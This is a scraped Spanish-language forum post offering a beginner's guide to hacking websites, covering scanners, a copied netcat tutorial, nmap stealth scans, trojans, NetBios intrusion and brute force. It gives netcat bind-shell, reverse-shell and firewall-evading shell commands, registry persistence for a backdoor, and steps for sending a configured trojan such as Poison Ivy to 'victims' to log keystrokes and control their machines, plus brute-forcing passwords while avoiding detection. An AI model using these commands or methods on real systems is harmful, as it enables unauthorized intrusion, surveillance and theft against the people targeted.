Sie sind auf Seite 1von 9

kent1396 Buscar...

+99
Posts Comunidades Música Juegos TOPs Global

Inicio Novatos Destacados  Crear post Historial

El post que buscas se encuentra eliminado, pero este también te puede interesar

HAZLO TU MISMO | HACE MÁS DE 1 AÑO Me gusta 3 1 1 morenosclub120

Guia de como hackear un pagina web (para  Seguir

principiantes) 170
Seguidores

421
Puntos
Guia de como hackear un pagina web (para principiantes)  49
Troll
Posts
13_Principales herramientas 
Ver más del autor »

Faltan algunas, pero ya las ireis descubriendo segun las necesidades que tengáis... 
Tags
Hackear web guia
Aquí teneis una lista con las herramientas principales y como se usan: 
facil Como principiantes
14_Shadow Security Scanner ( o SSS) 
de una pagina para

Cómo
Aqui teneis una captura de el SSS 

Esta herramienta es la primera de la lista, es el escaner de vulnerabilidades y de puertos más usado y el mejor (con
permiso del AcunetiX, que es parecido pero me parece mejor),. Lo malo es que el programa no es gratis xD a si que os lo
Compartido por
tendréis que bajar… o pagar $$$$ 

Bien, una vez instalado sale la pantalla. Es muy intuitivo. 

Le damos a New Session 

Complete Scan, y ya vamos siguiendo los pasos, que serían meter la ip una vez dado a finalizar al acabar el proceso,
para que empieze a escanear, seleccionamos la ip o la web y le damos a start scan. 

Una vez finalizado el escaner, a la izquierda tendremos una lista de los puertos abiertos, además de mucha más
información. 

Si pinchamos en la pestaña Vulnerabilities nos saldrán una lista de sitios por donde podremos pasar. La importancia de
las vulnerabilidades se miden por colores, las azules no tienen mucha importancia, y las rojas son críticas, que son con
las que vamos a trabajar principalmente. 

Si pinchamos en una vulnerabilidad, abajo del todo hay un número, si pinchamos nos llevará a un sitio web donde nos dirá
a que afecta la vulnerabilidad, una descripción e incluso el exploit para poder aprovecharnos de esa vunerabilidad. 

Nota para newbies: Un exploit es un código, que una vez compilado en su lenguaje de programación en el que esté
escrito ( normalmente c, esto se puede ver fijandose el la extensión que tiene el codigo del exploit) se abre con el ms­dos
y se siguen las instrucciones para conseguir acceso a la maquina remota. 

15_Netcat 
 

El netcat es una utilidad que sirve principalmente para escanear o ver el trafico que pasa por un puerto (sniffer), tambien
vale para hacer un Chat, muchísimas cosas, tambien puedes obtener el shell de otro ordenador con esta herramienta. 

Funcionamiento: 
Bien, abrimos el .exe que nos viene y nos sale una pantalla parecida a la del ms­dos y pone cmd line: 

Nota: Se manejar el netcat, pero ni mucho menos estoy informado de todas las cosas que se pueden hacer con el, asi
que he incluído este texto, pero no es mío, que conste 

Introducción: 

El netcat para win32, es un programa que funciona en ms­dos, sin entorno gráfico, y sirve para realizar conecciones de
casi cualquier tipo en tcp y udp. 
Conviene guardar nc.exe en %windir%/command (si vas a usar nc en una versión de win anterior a winme) o en
%windir%/system32 (si vas a usar nc en una versión posterior a winnt). Esto es xq en esas carpetas se guardan los
comandos externos del ms­dos y de esta forma vamos a poder usar el nc como un comando externo más. La ventaja de
esto es q no vamos a tener q ubicar la línea de comandos en la carpeta donde está guardado el nc cada vez que lo
keramos usar, sino que lo vamos a poder usar dsd cualquier carpeta. 
Para ver la ayuda incluida en el nc tipeamos nc ­h. 

Principales modos de uso: 

• client 
Podemos usar el nc para conectarnos a una maquina por cualquier puerto siempre que éste este abierto. 
La sintaxis básica es: 
{opciones} [ip/hostname]   
Las opciones, como su nombre lo indica, son opcionales, por lo que si yo tipeara en mi linea de comandos: 
201.234.131.38 23 
Se conectaría a 201.234.131.38 (fiar argentina) por el puerto 23 (telnet). 
Es muy recomendable usar siempre la opción ­vv para que el nc nos de información sobre el estado de la conección. Las
opciones siempre van antes de la direccion ip o el hostname y el puerto (en ese orden), por lo que la nueva sintaxis nos
kedaría: 
­vv {opciones} [ip/hostname]   
Las opciones que se pueden combinar con este uso son: 
­d (detach from console) modo oculto, en segundo plano, la conección sigue aunke c cierre el ms­dos 
­n (numeric ip only) c usa cuando c dá una ip en vez de un hostname y no keres q el nc use dns para averiguar el
hostname 
­o (hex dump of traffic) guarda todo el trafico de una conección en un archivo hexadecimal 
­p (local port number) elegís el puerto local para la conección 
­r (randomize local and remote ports) elige al azar los puertos no especificados. 
­s (local source address) dirección local 
­i (delay interval for lines sent) tiempo de espera entre línea y línea enviada 
­u (udp mode) realiza conecciones en puertos udp 
­v (verbose) modo detallado, usar dos veces para que sea más detallado 
­w (wait) tiempo en segundos en los que la conección se mantendrá sin que ninguna de las partes transfiera datos, x ej: si
pongo ­w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la conección termina. 

• server 
Podemos usar el nc para poner un puerto a la escucha y recibir conecciones entrantes. 
La sintaxis básica es: 
­l ­p {opciones}   
Donde   es el número de puerto que se kiere poner a la escucha. 
La opción ­l puede usarse en mayúscula ­L si se desea que luego de finalizada la conección, el nc siga escuchando en el
mismo puerto con las mismas opciones. De otra forma, al finalizar la coneccion, el nc se cerraría 
Opciones adicionales: 
­d (detach from console) funciona en segundo plano, independientemente del ms­dos 
­e (inbound program to exec) ejecuta un programa al conectarse un cliente. 
­i (delay interval for lines sent) tiempo de espera entre línea y línea enviada. 
­o (hex dump of traffic) guarda todo el trafico de una conección en un archivo hexadecimal. 
­r (randomize local and remote ports) elige al azar los puertos no especificados. 
­s (local source address) dirección local 
­u (udp mode) realiza conecciones con puertos udp 
­v (verbose) modo detallado, usar dos veces para que sea más detallado 
­w (wait) tiempo en segundos en los que la conección se mantendrá sin que ninguna de las partes transfiera datos, x ej: si
pongo ­w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la conección termina. 

• port scan 
Podemos usar el nc para comprobar que puertos tiene abiertos una máquina. 
La sintaxis básica sería: 
­z {opciones} [ip/hostname] [puerto/s] 
Opciones adicionales: 
­d (detach from console) funciona en segundo plano, independientemente del ms­dos 
­i (delay interval for lines sent) tiempo de espera entre línea y línea enviada. 
­n (numeric ip only) c usa cuando c dá una ip en vez de un hostname y no keres q el nc resuelva el hostname 
­o (hex dump of traffic) guarda todo el trafico de una conección en un archivo en hexadecimal. 
­s (local source address) dirección local 
­u (udp mode) realiza conecciones con puertos udp 
­v (verbose) modo detallado, usar dos veces para que sea más detallado 
­w (wait) tiempo en segundos en los que la conección se mantendrá sin que ninguna de las partes transfiera datos, x ej: si
pongo ­w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la conección termina. 
Los puertos pueden especificarse individualmente, x rangos (inclusivos) o ambos en cualquier orden. 

A partir de ésto pueden inventar infinitos usos combinando el nc con otros programas y opciones propias del ms­dos.
Además de varias opciones del nc que no expuse acá xq no estoy seguro de poder explicarlas. 

Ejémplos prácticos: 

• para conectarse a un servidor pop3 
capital.cf.rffdc.edu.ar 110 

• para conectarse a un servidor smpt en modo detallado: 
­vv capital.cf.rffdc.edu.ar 25 

• para conectarse a un servidor ftp en modo detallado dsd el puerto local 1337: 
­vv ­p 1337 capital.cf.rffdc.edu.ar 21 
­vv ­p 1337 ftp.microsoft.com.ar 21 
­vv ­p 1337 ftp.ar.geocities.com 21 
­vv ­p 1337 cablemodem.fibertel.com.ar 21 
o x el cliente ftp de ms: ftp [ip/hostname] 

• para conectarse a un servidor telnet aprovechando la opción ­t (answer telnet negociation) 
­vv ­t freeshell.org 23 
­vv ­t capital.cf.rffdc.edu.ar 23 
o x el cliente telnet de ms: telnet [ip/hostname] 

• para conectarse a un servidor web en modo detallado dsd el puerto 2236 guardando el trafico en un archivo hexadecimal
llamado wdeah.txt: 
­vv ­p 2236 ­o wdeah.txt www.google.com.ar 80 
­vv ­p 2236 ­o wdeah.txt www.desertwolf.com.ar 80 
­vv ­p 2236 ­o wdeah.txt www.fotolog.com 80 
o x ms iexplorer en dirección: [ip/host] 

• escanear puertos individualmente: 
­z www.ieslenguasvivasjrf.esc.edu.ar 21 23 20 22 80 110 
• escanear puertos por rangos inclusivos: 
­z 200.123.160.225 20­23 137­139 

• escanear por puertos tanto específicos como por rangos: 
­z www.ieslenguasvivasjrf.esc.edu.ar 137­139 80 110 

• shell directa 
Mediante este comando en un windows posterior a winme 
­l ­p 2236 ­e cmd.exe ­d 
A cualquiera que se conectase por el puerto 2236 mediante nc o telnet, le aparecería una shell equivalente al cmd.exe de
la maquina en la que se ejecutó el comando. Lo mismo ocurriría en un windows anterior a winme reemplazando cmd.exe
por command.com en el comando anterior. 

• shell inversa 
Esta técnica es una variación de la primera, con la diferencia que en esta la máquina que proporciona la shell se conecta
a la otra pudiendo de ésta forma saltar algunos routers y firewalls. Ideal para maquinas dentro de una red. 
Se ejecuta el siguiente comando en una maquina para ponerla a la escucha de conexiones por el puerto 2236: 
­vv ­L ­p 2236 
Luego, se ejecuta el siguiente comando en la maquina que va a proporcionar la shell para que se conecte a la primera: 
­d ­e [cmd.exe/command.com] [ip/hostname primera maq] 2236 

• shell inversa distribuida 
Está técnica es la más silenciosa y efectiva de todas, en ésta se realizan dos conexiones inversas (una para enviar
información y otra para recibirla) usando los puertos 25 y 80 que el firewall del win xp sp2 no filtra por tenerlos habilitados
por default para el envío (25 smpt) y recibo (80 http) de información. 
Para esto abrimos dos ventanas en la maquina que recibirá la shell en las que ponemos: 
­vv ­l ­p 80 

­vv ­l ­p 25 
Respectivamente, de manera que escuche conexiones por los puertos 80 y 25. Luego, en la máquina q proporcionará la
shell ponemos: 
nc [ip/hostname maq escucha] 80 | cmd.exe | nc [ip/hostname maq escucha] 25 
Una vez realizada la conexión, se envían los comandos desde la ventana que escucha por el puerto 80 y se reciben los
resultados en la ventana que escucha por el puerto 25. 

• backdoor 
Para dejar al nc funcionando a modo de backdoor se pueden utilizar diversos métodos, tales como agregar un valor
alfanumérico en el registro de win en la clave hkey_local_machinesoftwaremicrosoftwindowscurr entversionrun, o agregar
un línea al autoexec.bat o al win.ini, o utilizar el comando at, el programador de tareas, etc. 

• chat peer to peer 
Se puede crear un simple chat mediante nc entre dos personas escribiendo una de ellas (server) éste comando: 
­l ­p 1337 
y la otra (client) éste otro: 
nc [ip/hostname de la maq dnd c ejecuto el comando anterior] 1337 
La primera persona abriría el puerto 1337 para recibir conecciónes y la segunda se conectaría a su maquina por el puerto
que la primera persona abrió por lo que realizarían una conección directa puerto a puerto. 
Luego, lo que una de las personas escribiese en su nc aparecería en el nc del otro y viceversa. 

El autor de este texto es Franco Pyrih 

16_Nmap 

El nmap es un escáner, tambien de los más usados en la actualidad, por sus muchas opciones y porque da muchísima
información sobre el servidor que escanees, sus puertos, ect. 
Funcionamiento básico: 

El primer paso es obtener Nmap lo puede encontrar en http://www.insecure.org, existen versiones para Windows UNIX y
Linux entre otros. Si esta montando el sistema en Windows requiere WinPcap en Unix requerirá Libpcap. Para el caso de
Windows requerirá reiniciar el sistema para garantizar que se cargue el controlador del la tarjeta. Una vez ha instalado la
herramienta es hora de utilizarla, el primer scan puede ser relativamente simple así: 
nmap 192.168.1.1 
Esta salida es la que podrá ver en sus sistema: 
$ nmap 192.168.1.254 
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005­06­05 15:08 EDT 
Interesting ports on 192.168.1.254: 
(The 1661 ports scanned but not shown below are in state: filtered) 
PORT STATE SERVICE 
21/tcp open ftp 
80/tcp open http 
Este scan es muy básico puesto que no se han definido ninguno de los parámetros del sistema es apropiado decir que la
salida es lo suficientemente clara, nos indica que puestos están abiertos, ahora si queremos mas información debemos
hacer uso de parámetros dentro del sistema. 
En este punto vamos a ver una opción bastante común de scan que le permite hacer el registro de servicios abiertos de
forma discreta (sin registro en los Log’s del sistema) 
$ nmap –sS 192.168.1.1 
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005­06­05 15:40 EDT 
Interesting ports on 192.168.1.1: 
(The 1641 ports scanned but not shown below are in state: closed) 

PORT STATE SERVICE 
21/tcp open ftp 
25/tcp filtered smtp 
42/tcp open nameserver 
53/tcp open domain 
80/tcp open http 
88/tcp open kerberos­sec 
135/tcp open msrpc 
139/tcp open netbios­ssn 
389/tcp open ldap 
445/tcp open microsoft­ds 
464/tcp open kpasswd5 
514/tcp filtered shell 
593/tcp open http­rpc­epmap 
636/tcp open ldapssl 
1026/tcp open LSA­or­nterm 
1027/tcp open IIS 
3268/tcp open globalcatLDAP 
3269/tcp open globalcatLDAPssl 
3389/tcp open ms­term­serv 
6666/tcp filtered irc­serv 
6667/tcp filtered irc 
6668/tcp filtered irc 

Nmap finished: 1 IP address (1 host up) scanned in 135.733 seconds 

El truco detrás de este tipo de scan es que debemos lograr pasar lo mas inadvertidos en el proceso puesto que de lograr
hacer el barrido de puertos la mayoría de los Firewall van a intentar evitar el reconocimiento algunos de los sistemas
detectan el barrido de puertos por medio de el análisis de los requerimientos a los puertos de forma muy rápida. 

Cabe resaltar que existen varios tipos de modificadores de scan lo mas importante es lograr identificar la combinación
mas apropiada, los modificadores que se pueden utilizar para realizar el scan son los siguientes: 
$ nmap –sT 192.168.1.1 
$ nmap –sU 192.168.1.1 
$ nmap –sA 192.168.1.1 
$ nmap –sX 192.168.1.1 
$ nmap –sN 192.168.1.1 
$ nmap –sF 192.168.1.1 
$ nmap –sP 192.168.1.1 
$ nmap –sV 192.168.1.1 
Veamos que significan estos modificadores 
• sT se intenta hacer un barrido de puertos por TCP la ventaja de esta técnica es que no requiere usuarios privilegiados,
opuesto a sS 

• sU se intenta hacer un barrido de puertos por UDP, es útil cuando se intentan descubrir puertos de nivel superior que
pueden estar detrás de un firewall, lenta pero permite hacer auditorias mas exactas. 
• sA se usan mensajes de ACK para lograr que sistema responda y así dterminar si el puerto esta abierto algunos
Firewall no filtran estos Mensajes y por ello puede ser efectivo en algunos casos. 

• sX puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red 
• sN puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red 
• sF puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red 

• sP este modificador ayuda a identificar que sistemas están arriba en la red (en funcionamiento) para luego poder hacer
pruebas mas especificas, similar a Ping. 
• sV intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma
individual para intentar ubicar vulnerabilidades en los mismos. 

• sO con esta opción se identifica que protocolos de nivel superior a capa tres (Red o Network) responden en el sistema,
de esta manera es mas fácil saber las características de la red o el sistema que se intenta evaluar. 
Adicionalmente a las opciones de scan se pueden especificar opciones que permiten explotar mas aun la herramienta,
dentro de las opciones que mas frecuentemente se usan están las de evitar el Ping o mostrar todos los resultados en
pantalla al máximo detalle, veamos cuales son estas opciones: 
• vv hacer la salida de la herramienta detallada en pantalla 
• f habilita la fracmentacion de esta forma es mucho mas complejo para un un firewall u otro tipo de sistema lograr hacer
el rastreo. 
• oN redirige la salida a un archivo 
• oX redirige la salida a un archivo XML 
• –stylesheet con esta opción se usa una hoja de estilo que hace mas fácil la lectura de la salida en XML 
• P0 indica que no se debe hacer ping a los sistemas objetivo antes de iniciar el análisis útil para evitar el bloque en
algunos Firewall 
• p se usa para especificar puertos de análisis o rango de puertos. 
• T se usa para especificar la velocidad general del scan de esta forma se puede pasar inadvertido en algunos sistemas
que detectan la velocidad de los paquetes entrantes. 
Texto extraído de www.dragonjar.us 

NOTA IMPORTANTE: Para abrir el nmap, teneis que abrir el directorio donde lo teneis metido ( descomprimido, claro)
con el ms­dos (ya sabéis, usando dir y cd) y luego nmap mas las opciones. 

17_Troyanos. 

Esta parte es importante 
Los troyanos son programas, que constan de dos partes, el Server y el cliente. El Server se lo envías a la víctima
debidamente configurado, y una vez que lo abra podrás controlar su ordenador desde el tuyo con el cliente, ver lo que
esta escribiendo en tiempo real (keylogger) , capturar su pantalla, acceder a su disco duro, ect… 
Los troyanos mas famosos son el subseven, el netbus, el bifrost y el poison ivy. 

Hay dos tipos de troyanos, los de conexión directa, en el que tu te conectas a la victima, que no los recomiendo, porque
si la victima tiene la ip dinamica cuando le cambie ya no vas a poder controlarlo, y los de conexión inversa, en el que la
victima se conecta a tu maquina (aunque ella no te puede controlar a ti, claro). 

Bueno, primero teneis que ver antes de todo, si teneis la ip dinamica o estatica, se puede comprobar en www.vermiip.es ,
si la ip va cambiando, es dinamica y te tienes que hacer una cuenta en no­ip, si es estatica no hace falta. 
http://www.no­ip.com/ 

De esta dirección podeis haceros la cuenta, os bajais el programilla y cada vez que lo abrais tendreis la ip estatica. 

Después, configuras el troyano, en la ip metes la direccion no­ip que pusiste, por ejemplo: 

Hackerejemplo.no­ip.biz y en el puerto teneis que poner uno que este ABIERTO. 

Para verlo ya sabeis, os haceis un scan a vosotros mismos y ya lo poneis. 

El puerto abierto mas comun es el 80. 

Algunos troyanos traen un test en el cliente para ver si el puerto que pones esta abierto, como en el troyano poison ivy,
muy bueno. 

En el caso de no encontrar el puerto correcto, lo tendreis que abrir vosotros mismos en la configuración del router. 

18_Intrusión mediante NetBios 

Este es un metodo poco usado en la actualidad, tambien por estar desfasado, pero hay que saberlo. Trata sobre como
acceder a los recursos que tiene compartidos un pc, como por ejemplo mis documentos, o el mismo disco duro 
Lo primero: Configurando nuestro pc 

Lo que tenemos que hacer para que nuestro pc pueda meterse en otro por NetBios, lo primero es activarlo en nuestro pc. 
• Clic en Inicio. 
• Clic en Panel de control. 
• Clic en Conexiones de red. 
• Doble clic sobre el icono de conexión (la conexión a Internet, claro) 
• Clic en Propiedades. 
• En la ventana que apareció, dad doble clic sobre Protocolo Internet (TCP/IP). 
• Clic en Opciones avanzadas. 
• Clic en la pestaña WINS. 
• Clic sobre Habilitar NetBios sobre TCP/IP. 
• Clic en Aceptar (lo mismo para las demás ventanas). 

Bueno, pues ya está habilitado, ahora manos a la obra. 

Para comprobar si un pc comparte algo, tenemos que abrir el ms­dos y ejecutar el siguiente comando: 
C ocuments and SettingsPepe>nbtstat –a ipdelavictima 

Saldra el nombre de la maquina victima, y otros, como por ejemplo Casa, etc. Bien, si en la columna de al lado de los
nombres de pcs hay algun 20 la maquina comparte recursos. 

Ahora vamos a ver lo que tiene compartido la máquina: 
Se ejecuta el siguiente comando: 
C ocuments and SettingsPepe>net view ipdelamaquina 

Ejecutando este comando veremos lo que comparte ( por ejemplo, el disco duro) 

Una vez hecho esto no vamos a Inicio­Ejecutar 

En ejecutar ponemos 

Ipdelavictima 

Bueno, le damos a intro y eso (xD) y si todo salió bien nos aparecerá una ventana de Windows donde veremos los
archivos compartidos. 

Este metodo esta bien, aunque es un poco antiguo. 

19_Intrusión mediante vulnerabilidades. 

Ejemplo de un exploit 

Es la forma de hackear mas actualizada, es decir, mas actual. Hay muchas clases de vulnerabilidades, algunas
necesitan exploit (un programa que nosotros compilaremos) o no, por ejemplo rfi (remote file inclusion), inyeccion SQL y
más... 
Pero cada exploit es diferente, los puedes buscar en paginas como security focus o milw0rm 

Para informaros mas buscad en google 

20_Fuerza Bruta 

Es una manera de averiguar las contraseñas de, ftp, webs y otras cosas con programas que prueban distintas
combinaciones de letras hasta que den con la contraseña. 
Para la fuerza bruta recomiendo el Brutus AET2, y un buen diccionario con palabras. 
Este metodo se suele utilizar como ultimo recurso, ya que es facil que te pillen si lo utilizas demasiado... 

21_Programación 
Bien, en este punto no me voy a detener mucho porque no puedo dedicarme a enseñar un lenguaje entero, este punto es
simplemente para decir que aprender a programar es fundamental para esto, tal vez te parezca que no, pero llegara un
momento que tendras que hacer tus propios programas. Algunos lenguajes son: C, Python, Visual Basic, etc, bueno hay
muchos más, elige el tuyo 

salu2!

3 1

Me gusta

No tienes más puntos para dar hoy 2 Puntos
T! score: 1 / 10

Seguir A favoritos
33 4.506 0
Favoritos Visitas Seguidores

Relacionados
Guia crear pag web facil cencillo y gratis

Crear tu propio buscador para tu pagina web "Facil"

Haz tu pagina web (gratis,facil y rapido)

Empezar una página web de cero coma uno

Guia facil para sacar abdominales y perder barriga

Como editar cualquier página web a tu gusto

Guia para hackear Websites

Guia para hackear Websites

10 comentarios
@ CASU1609 hace 1 año +3

buen post

@ Nyko_suspendi2_xtrollembrasil hace 1 año +4

No lei un carajo

@ JuliBrezzo hace 1 año +4

Algo mas sencillo?

@ Vity_boca hace 1 año +2

Nyko_suspendi2_xtrollembrasil dijo:
No lei un carajo

JuliBrezzo dijo:
Algo mas sencillo?

@ jonhygroxx hace 1 año
@ morenosclub120 hace 1 año

no se nada mas sencillo

@ Snake_14 hace 9 meses

pone la fuente baboso de mierdaaa

@ morenosclub120 hace 9 meses

no me acuerdo de cual era

@ Luchoo37 hace 6 meses

@ Luchoo37 hace 6 meses

Buscar... Ir al cielo

Anunciar   Ayuda   Prensa   Protocolo   Desarrolladores   Denuncias   Report Abuse ­ DMCA   Términos y condiciones   Privacidad de datos

Das könnte Ihnen auch gefallen